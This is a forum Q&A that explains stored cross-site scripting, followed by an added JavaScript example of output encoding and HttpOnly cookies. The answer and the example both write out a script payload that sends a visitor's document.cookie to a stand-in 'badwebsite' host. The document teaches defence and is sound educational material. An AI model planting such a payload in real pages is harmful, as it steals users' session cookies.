daniellearman
208 Points
Using XSS
How does the user get into the system in order to know the cookies? Does he know the user preferences?
1 Answer
Brendan Whiting
Front End Web Development Techdegree Graduate 84,738 Points
Let’s say Treehouse had a vulnerability to XSS, and I was a hacker. I could change my name, from “Brendan”, to
“Brendan <script> window.location='http://badwebsite/?cookie='+document.cookie </script>”.
Then, when other users visit Treehouse, and they see posts I write on the forum, Treehouse would send a webpage to their browser with my name - but in this case, my name also has a script that will run in the user’s browser; it will access their cookie (document.cookie) and it will send them to my bad website along with the cookie data to my bad website’s server.
Kevin Gates
15,053 Points
IMO: "Best Answer" is above.
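The scenario in the answer above, seen from the defending site's side, as an added example that is not part of the original thread: the same display name rendered by string concatenation and then with output encoding, plus a model of which cookies `document.cookie` exposes once the session cookie is marked `HttpOnly`. The function names, the post markup and the cookie values are assumptions constructed for illustration.

```javascript
// Added example: function names and sample values are constructed for illustration.

// Display name from the answer above, stored exactly as it was submitted.
const storedName =
  "Brendan <script> window.location='http://badwebsite/?cookie='+document.cookie </script>";

// Vulnerable: user-controlled text is concatenated into HTML, so the browser
// parses the <script> element and runs it in every reader's own session.
function renderPostUnsafe(name, body) {
  return `<div class="post"><b>${name}</b><p>${body}</p></div>`;
}

// Encode the characters that let text break out of an HTML text or attribute context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same name is displayed as literal text, never parsed as markup.
function renderPostSafe(name, body) {
  return `<div class="post"><b>${escapeHtml(name)}</b><p>${escapeHtml(body)}</p></div>`;
}

// Second layer: model which cookies page script can read via document.cookie.
// Cookies set with the HttpOnly attribute are withheld from script by the browser.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !h.split(";").slice(1).some((a) => a.trim().toLowerCase() === "httponly"))
    .map((h) => h.split(";")[0].trim())
    .join("; ");
}

// Constructed Set-Cookie headers: the weak configuration beside the hardened one.
const weak = ["session=abc123; Path=/", "theme=dark; Path=/"];
const hardened = ["session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax", "theme=dark; Path=/"];

console.log(renderPostUnsafe(storedName, "Hello"));
console.log(renderPostSafe(storedName, "Hello"));
console.log("script sees (weak):    ", scriptVisibleCookies(weak));
console.log("script sees (hardened):", scriptVisibleCookies(hardened));
```

Output encoding removes the injection itself; `HttpOnly` only limits what an injected script could read if encoding is missed somewhere, so the two are used together.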